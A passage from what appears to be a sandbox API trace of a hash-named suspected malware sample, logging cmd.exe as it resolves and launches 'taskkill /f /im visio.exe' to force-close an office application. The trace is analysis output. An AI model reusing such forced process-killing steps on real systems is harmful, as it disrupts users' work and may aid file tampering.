(hKey=0x88) returned 0x0 [0226.316] time (in: timer=0x0 | out: timer=0x0) returned 0x62344250 [0226.316] srand (_Seed=0x62344250) [0226.316] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im visio.exe \"" [0226.316] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im visio.exe \"" [0226.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0226.316] GetProcessHeap () returned 0x590000 [0226.316] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x596fd0 [0226.316] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x596fd8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0226.316] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0226.316] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0226.317] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0226.317] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0226.317] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0226.317] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0226.317] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0226.317] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0226.317] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0226.317] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0226.317] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0226.317] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0226.318] GetProcessHeap () returned 0x590000 [0226.319] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5989f8) returned 1 [0226.319] GetEnvironmentStringsW () returned 0x597fd0* [0226.319] GetProcessHeap () returned 0x590000 [0226.319] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa32) returned 0x59a888 [0226.320] FreeEnvironmentStringsA (penv="A") returned 1 [0226.320] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0226.320] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0226.320] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0226.320] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0226.320] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0226.320] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0226.320] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0226.320] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0226.320] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0226.320] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0226.320] GetProcessHeap () returned 0x590000 [0226.320] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5971e8 [0226.320] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0226.321] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0226.321] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0226.321] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x597238 [0226.321] FindClose (in: hFindFile=0x597238 | out: hFindFile=0x597238) returned 1 [0226.321] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x597238 [0226.322] FindClose (in: hFindFile=0x597238 | out: hFindFile=0x597238) returned 1 [0226.322] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0226.322] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x597238 [0226.322] FindClose (in: hFindFile=0x597238 | out: hFindFile=0x597238) returned 1 [0226.322] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0226.322] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0226.322] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0226.322] GetProcessHeap () returned 0x590000 [0226.323] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59a888) returned 1 [0226.323] GetEnvironmentStringsW () returned 0x597fd0* [0226.323] GetProcessHeap () returned 0x590000 [0226.323] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa76) returned 0x599e48 [0226.323] FreeEnvironmentStringsA (penv="=") returned 1 [0226.323] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0226.323] GetProcessHeap () returned 0x590000 [0226.324] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5971e8) returned 1 [0226.324] GetProcessHeap () returned 0x590000 [0226.324] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x59bd48 [0226.325] GetProcessHeap () returned 0x590000 [0226.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x46) returned 0x5971e8 [0226.325] GetProcessHeap () returned 0x590000 [0226.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x59fd60 [0226.325] GetProcessHeap () returned 0x590000 [0226.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5a3d70 [0226.327] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0226.328] GetProcessHeap () returned 0x590000 [0226.328] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x59a8c8 [0226.328] SetErrorMode (uMode=0x0) returned 0x8003 [0226.329] SetErrorMode (uMode=0x1) returned 0x0 [0226.329] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x59a8d0, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0226.329] SetErrorMode (uMode=0x8003) returned 0x1 [0226.329] GetProcessHeap () returned 0x590000 [0226.329] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x59a8c8, Size=0x78) returned 0x59a8c8 [0226.329] GetProcessHeap () returned 0x590000 [0226.329] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x59a8c8) returned 0x78 [0226.329] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0226.329] GetProcessHeap () returned 0x590000 [0226.329] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x597238 [0226.329] GetProcessHeap () returned 0x590000 [0226.329] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb8) returned 0x59a948 [0226.330] GetProcessHeap () returned 0x590000 [0226.330] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x59a948, Size=0x62) returned 0x59a948 [0226.330] GetProcessHeap () returned 0x590000 [0226.330] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x59a948) returned 0x62 [0226.330] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0226.330] GetProcessHeap () returned 0x590000 [0226.330] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe0) returned 0x59a9b8 [0226.336] GetProcessHeap () returned 0x590000 [0226.336] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x59a9b8, Size=0x76) returned 0x59a9b8 [0226.336] GetProcessHeap () returned 0x590000 [0226.337] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x59a9b8) returned 0x76 [0226.337] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.337] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im visio.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0226.337] GetLastError () returned 0x3 [0226.337] GetProcessHeap () returned 0x590000 [0226.338] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59fd60) returned 1 [0226.338] GetProcessHeap () returned 0x590000 [0226.338] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a3d70) returned 1 [0226.339] GetProcessHeap () returned 0x590000 [0226.339] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59bd48) returned 1 [0226.339] GetConsoleOutputCP () returned 0x1b5 [0226.342] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0226.342] GetUserDefaultLCID () returned 0x409 [0226.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0226.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0226.343] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0226.343] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0226.345] GetProcessHeap () returned 0x590000 [0226.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x59aa80 [0226.347] GetConsoleTitleW (in: lpConsoleTitle=0x59aa80, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0226.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0226.349] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0226.349] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0226.349] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0226.350] GetProcessHeap () returned 0x590000 [0226.350] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x59bd48 [0226.350] GetProcessHeap () returned 0x590000 [0226.351] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59bd48) returned 1 [0226.352] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0226.352] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0226.352] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0226.352] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0226.352] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0226.352] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0226.352] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0226.352] GetProcessHeap () returned 0x590000 [0226.352] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x59ac98 [0226.352] GetProcessHeap () returned 0x590000 [0226.352] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x597e80 [0226.352] GetProcessHeap () returned 0x590000 [0226.352] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5972a8 [0226.353] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0226.354] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0226.354] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0226.354] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0226.354] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0226.354] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0226.354] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0226.354] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0226.355] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0226.355] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0226.355] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0226.355] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0226.355] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0226.355] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0226.355] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0226.355] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0226.355] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0226.355] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0226.355] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0226.355] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0226.355] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0226.355] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0226.355] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0226.355] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0226.355] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0226.355] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0226.355] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0226.355] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0226.355] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0226.355] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0226.355] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0226.355] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0226.355] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0226.355] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0226.355] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0226.355] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0226.355] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0226.356] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0226.356] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0226.356] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0226.356] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0226.356] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0226.356] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0226.356] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0226.356] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0226.356] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0226.356] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0226.356] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0226.356] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0226.356] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0226.356] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0226.356] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0226.356] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0226.356] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0226.356] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0226.356] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0226.356] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0226.356] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0226.356] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0226.356] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0226.356] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0226.356] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0226.356] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0226.356] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0226.357] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0226.357] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0226.357] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0226.357] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0226.357] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0226.357] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0226.357] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0226.357] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0226.357] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0226.357] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0226.357] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0226.357] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0226.357] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0226.357] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0226.357] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0226.357] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0226.357] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0226.357] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0226.357] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0226.357] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0226.357] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0226.357] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0226.357] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0226.358] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0226.358] GetProcessHeap () returned 0x590000 [0226.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x59acf8 [0226.358] GetProcessHeap () returned 0x590000 [0226.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x40) returned 0x59af10 [0226.358] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0226.359] GetProcessHeap () returned 0x590000 [0226.359] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x5905c8 [0226.359] SetErrorMode (uMode=0x0) returned 0x8003 [0226.359] SetErrorMode (uMode=0x1) returned 0x0 [0226.359] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5905d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0226.359] SetErrorMode (uMode=0x8003) returned 0x1 [0226.359] GetProcessHeap () returned 0x590000 [0226.359] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5905c8, Size=0x56) returned 0x5905c8 [0226.359] GetProcessHeap () returned 0x590000 [0226.359] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5905c8) returned 0x56 [0226.359] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0226.359] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0226.359] GetProcessHeap () returned 0x590000 [0226.359] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x110) returned 0x59af58 [0226.359] GetProcessHeap () returned 0x590000 [0226.359] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x218) returned 0x59b070 [0226.365] GetProcessHeap () returned 0x590000 [0226.365] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x59b070, Size=0x112) returned 0x59b070 [0226.365] GetProcessHeap () returned 0x590000 [0226.365] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x59b070) returned 0x112 [0226.365] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0226.365] GetProcessHeap () returned 0x590000 [0226.365] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe0) returned 0x59b190 [0226.367] GetProcessHeap () returned 0x590000 [0226.367] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x59b190, Size=0x76) returned 0x59b190 [0226.367] GetProcessHeap () returned 0x590000 [0226.367] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x59b190) returned 0x76 [0226.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.368] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0226.368] GetLastError () returned 0x2 [0226.368] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x59b210 [0226.368] GetProcessHeap () returned 0x590000 [0226.368] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5976d8 [0226.368] FindClose (in: hFindFile=0x59b210 | out: hFindFile=0x59b210) returned 1 [0226.369] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0226.369] GetLastError () returned 0x2 [0226.369] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x59b210 [0226.369] GetProcessHeap () returned 0x590000 [0226.369] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5976d8, Size=0x4) returned 0x59b250 [0226.369] FindClose (in: hFindFile=0x59b210 | out: hFindFile=0x59b210) returned 1 [0226.369] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0226.369] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0226.369] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0226.370] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0226.370] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0226.370] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130)) [0226.370] GetProcessHeap () returned 0x590000 [0226.370] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x597618 [0226.370] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0226.370] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0226.370] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0226.370] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0226.371] _wcsnicmp 